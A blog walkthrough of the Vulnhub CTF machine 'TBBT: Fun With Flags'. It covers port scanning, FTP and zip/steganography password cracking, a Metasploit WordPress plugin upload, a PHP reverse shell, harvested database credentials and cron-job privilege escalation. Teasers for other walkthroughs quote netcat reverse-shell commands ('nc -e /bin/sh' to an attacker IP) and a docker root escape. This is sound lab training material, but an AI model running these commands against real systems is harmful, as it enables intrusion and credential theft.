TBBT: Fun With Flags - Walkthrough [Vulnhub]

Here's my solution for TBBT: Fun With Flags.
The machine can be downloaded from here.

Flag-Sheldon
Scanning for all TCP ports.
$ nmap -sC -sV -p- 192.168.1.105



We find 4 ports open as well as the flag-sheldon/can also browse http://192.168.1.105:1337 to get the flag.


Flag-Howard
Since ftp is open and allows anonymous login.
$ ftp 192.168.1.105
Name: anonymous

We download a zip file located under- /pub/howard




While unzipping it ask's for password, as we do not know the password we brute-force it using fcrackzip.




We get the password as- astronaut, we unzip it and we get an image file.




We run steghide against the image file, to check if there's any hidden file/message.


Asking for password, as we do not have any we try to brute force it using stegcracker.


We successfully cracked it.

Flag-Bernadette
Scanning directories using dirb.
$ dirb http://192.168.1.105/ -r

Again we try to brute-force /music directory.


Interesting. On browsing /music/wordpress, we find that it is built on CMS- Wordpress.
We use wpscan to scan for all plugins and users.
$ wpscan --url http://192.168.1.105/music/wordpress -e ap,u

We find one plugin, metasploit does have an exploit module to exploit this plugin.
Lets start the msf console and load the exploit module.
$ sudo msfdb run
$ use exploit/unix/webapp/wp_reflexgallery_file_upload



We provide the required information and exploit it.

 

We upload a php reverse shell file under web root directory to get a normal shell and exit the msf console.

 

We browse, http://192.168.1.105/shell.php and on the other hand we start the netcat listener.


We get the reverse shell successfully.

We find database credentials in file- db_config.php, under the directory- /var/www/html/private


Lets access mysql using found credentials and get the flag.
$ mysql -ubigpharmacorp -pweareevil

Flag-Raz
Again we find a wordpress config file under the directory- /var/www/html/music/wordpress which has database credentials.


We access mysql with found credentials and get the flag.
$ mysql -ufootprintsonthemoon -pfootprintsonthemoon1337




Flag-Amy
We navigate to- /home/amy, we find a text file and an executable file.


 
After reading the contents of the file- notes.txt, the executable file i.e secretdiary becomes sucpicious. We run strings against the file and we see the password and the flag.


Flag-Penny
We naviagte to- /home/penny, and we find the next flag in a hidden file- .FLAG.penny.txt


Flag-Leonard
We naviagte to- /home/leonard, we find a bash file- thermostat_set_temp.sh, reading the contents of the file seems that this files runs every minute, a cron job.

We verify it by checking for cron jobs.



Interesting. Now we place the reverse shell payload into the file and on the other hand we start the netcat listener.


We wait for a minute to get the reverse shell, and we obtain the final flag.

Comments

Post a Comment

Popular posts from this blog

Sunset:Noontide - Walkthrough [Vulnhub]

Image
Here's my solution for Sunset:Noontide. The machine can be downloaded from here. Nmap Scanning for all TCP ports. $ nmap -sC -sV -p- 192.168.1.109 We find 3 ports (UnrealIRCd) open. Enumeration We search the exploit for UnrealIRCd and we find it here.     Getting Access To exploit we simply run the nmap command with the reverse shell payload and on the other hand we start the netcat listener. $ nmap -d -p6667 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='nc -e /bin/sh 192.168.1.108 1234' 192.168.1.109 We get the reverse shell. User Flag. Privilege Escalation We find that user- root has the default password- root. Lets switch to user- root and get the root flag. $ su root Password: root  
Read more

CyberSploit:2 - Walkthrough [Vulnhub]

Image
Here's my solution for CyberSploit:2. The Machine can be downloaded from here Nmap Starting with nmap scanning for all TCP open ports. nmap -sC -sV -p- 192.168.1.103 We find only 2 open ports. Enumeration Browsing the website, show list of usernames and passwords. Checking the source code reveal us a hint- ROT47. While browsing the website, we see a strange username- D92:=6?5C2 and its associated password as- 4J36CDA=@:E` From the hint we can guess that the username and password can be ROT47 encoded. Browsed Decode.fr to decode it, and we get the credentials as- username: shailendra password: cybersploit1 Getting Access Tried ssh with credential, and we get the access. ssh shailendra@192.168.1.1 password: cybersploit1 Found a file named as hint.txt, which gives a hint as docker, it can be used for privilege escalation, also the user is a member of docker group. Privilege Escalation docker run -v /:/mnt --rm -it alpine chroot /mnt sh And we get the flag
Read more

BBS(cute):1.0.1 - Walkthrough [Vulnhub]

Image
Here's my solution for BBS(cute):1.0.1. The machine can be downloaded from here. Nmap Scanning for all TCP ports. $ nmap -sC -sV -p- 192.168.1.111 We find 5 ports open. Enumeration Browsing the web hosted on port 80 (Default HTTP Port). We do not find any useful information lets run the dirb for scanning directories. $ dirb http://192.168.1.111 -r Browsing /index.php We see that it is built on CMS- CuteNews and its version 2.1.2 We search for the exploit and found it here.   Lets get this exploit. Getting Access But before running the exploit we need to make some changes. We remove all /CuteNews from the exploit code, in order to run it successfully. Done with the changes, now we run the exploit. $ python3 48800.py We provide the required information that is, the URL and hit enter. The commands are running fine, but we are not able to navigate to different directories, hence we try to get the normal reverse shell. We see netcat is present, we enter the payload. $ nc -e /bin/bash 19...
Read more